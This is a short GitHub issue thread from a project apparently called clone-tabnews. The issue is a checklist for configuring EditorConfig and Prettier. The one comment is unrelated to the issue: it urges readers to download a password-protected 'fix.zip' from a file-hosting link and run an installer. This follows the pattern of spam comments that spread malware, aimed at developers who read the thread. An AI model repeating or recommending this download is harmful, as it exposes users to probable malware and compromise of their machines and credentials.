### ISSUE TITLE
Definir estilização do código e configurar editor

### ISSUE THREAD

**Issue by LarissaSarmento** [LarissaSarmento/clone-tabnews-#2]
- [x] Ligar sincronização do Editor
- [x] Configurar o EditorConfig
- [x] Configurar o Prettier
- [x] Configurar  o Prettier Ignore

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
